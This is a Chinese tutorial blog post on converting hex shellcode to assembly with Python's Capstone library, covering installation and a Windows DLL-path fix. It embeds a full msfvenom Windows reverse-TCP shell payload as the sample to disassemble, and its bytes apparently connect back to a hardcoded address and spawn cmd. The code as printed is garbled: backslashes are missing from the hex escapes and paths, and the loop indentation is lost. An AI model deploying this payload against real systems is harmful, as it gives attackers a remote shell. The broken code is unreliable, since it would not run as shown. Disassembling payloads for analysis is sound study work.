• 【Python】使用Python将Shellcode转换成汇编


    1、介绍

    需要多少行代码转换hex成反汇编呢?
    多亏了Python的Capstone库,做这件事只需要五行。
    在二进制分析中,进行Exploit开发或逆向工程时,需要快速将十六进制的Shellcode反编译成反汇编。你可以使用像OllyDbg或IDA Pro这样的反编译工具,但如果你不想使用一个成熟的反编译工具执行这个小任务,那么下面的Python代码将有助于你把Shellcode转换成反汇编形式

    如果你还没有安装capstone,那么你需要使用以下方法进行安装:

    2、安装

    2.1、基于Debian

    使用以下命令下载并安装。
    Note:在kali Linux已经有了。

     apt-get install python-capstone
    

    2.2、基于Windows

    windows需要下载以下的MSI文件后运行图形化向导进行安装:
    32 bit

    https://github.com/aquynh/capstone/releases/download/3.0.5-rc2/capstone-3.0.5-rc2-python-win32.msi
    

    64 Bit

    https://github.com/aquynh/capstone/releases/download/3.0.5-rc2/capstone-3.0.5-rc2-python-win64.msi
    

    3、示例

    这个例子是从msfvenom摘出来的反向TCP连接shellcode

    #!/usr/bin/env python
    from capstone import *
    
    shellcode = ""
    shellcode += "xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b"
    shellcode += "x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
    shellcode += "x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf"
    shellcode += "x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c"
    shellcode += "x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01"
    shellcode += "xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31"
    shellcode += "xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d"
    shellcode += "xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66"
    shellcode += "x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0"
    shellcode += "x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f"
    shellcode += "x5fx5ax8bx12xebx8dx5dx68x33x32x00x00x68"
    shellcode += "x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8"
    shellcode += "x90x01x00x00x29xc4x54x50x68x29x80x6bx00"
    shellcode += "xffxd5x50x50x50x50x40x50x40x50x68xeax0f"
    shellcode += "xdfxe0xffxd5x97x6ax05x68xc0xa8x74x80x68"
    shellcode += "x02x00x1fx90x89xe6x6ax10x56x57x68x99xa5"
    shellcode += "x74x61xffxd5x85xc0x74x0cxffx4ex08x75xec"
    shellcode += "x68xf0xb5xa2x56xffxd5x68x63x6dx64x00x89"
    shellcode += "xe3x57x57x57x31xf6x6ax12x59x56xe2xfdx66"
    shellcode += "xc7x44x24x3cx01x01x8dx44x24x10xc6x00x44"
    shellcode += "x54x50x56x56x56x46x56x4ex56x56x53x56x68"
    shellcode += "x79xccx3fx86xffxd5x89xe0x4ex56x46xffx30"
    shellcode += "x68x08x87x1dx60xffxd5xbbxaaxc5xe2x5dx68"
    shellcode += "xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0"
    shellcode += "x75x05xbbx47x13x72x6fx6ax00x53xffxd5"
    
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    for i in md.disasm(shellcode, 0x00):
    print("0x%x:	%s	%s" %(i.address, i.mnemonic, i.op_str))
    

    代码解释:

    md = Cs(CS_ARCH_X86, CS_MODE_32): 初始化类,给两个参数(硬件架构和硬件模式)
    for i in md.disasm(shellcode, 0x00):  disasm 反汇编这段HEX, 它的参数是shellcode和起始地址。
    print(“0x%x:	%s	%s” %(i.address, i.mnemonic, i.op_str)):打印地址和操作数。
    

    4、结果

    保存上述代码并执行,下面的屏幕截图显示了用Python脚本输出十六进制(shellcode)的汇编

    图:用简单的Python脚本将HEX转换成反汇编

    5、实践部分

    我在安装capstone的时候遇到了一个错误
    错误信息如下:

    Traceback (most recent call last):
      File "sl.py", line 2, in <module>
        from capstone import *
      File "C:Python27libsite-packagescapstone\__init__.py", line 249, in <module>
        raise ImportError("ERROR: fail to load the dynamic library.")
    ImportError: ERROR: fail to load the dynamic library.
    

    一路往下Debug,最后发现是ctypes加载DLL的时候报错了,不知道为何。

    C:Python27Libsite-packagescapstone\__init__.py
    

    于是我手动把210行代码lib路径改成DLL的绝对路径

        _lib = "capstone.dll" # 修改前
        _lib = "C:\Python27\lib\site-packages\capstone\lib\capstone.dll" # 修改后
    

    修改后的代码如下:

    if sys.platform == 'darwin':
        _lib = "libcapstone.dylib"
    elif sys.platform in ('win32', 'cygwin'):
        _lib = "C:\Python27\lib\site-packages\capstone\lib\capstone.dll"
    else:
        _lib = "libcapstone.so"
    
    

    6、实践运行后的结果

    7、参考

    https://haiderm.com/convert-hex-assembly-using-simple-python-script/
    
  • 相关阅读:
    「ZJOI2019」开关
    「ZJOI2019」Minimax 搜索
    杨氏矩阵学习笔记
    「LibreOJ NOI Round #2」简单算术
    「LibreOJ NOI Round #2」小球进洞
    组合总和 II(力扣第40题)
    组合总和 I(力扣第39题)
    组合(力扣第77题)
    使用MapReduce解决蚂蚁森林第二题
    Hive练习--蚂蚁森林习题二
  • 原文地址:https://www.cnblogs.com/17bdw/p/7898905.html
Copyright © 2020-2023  润新知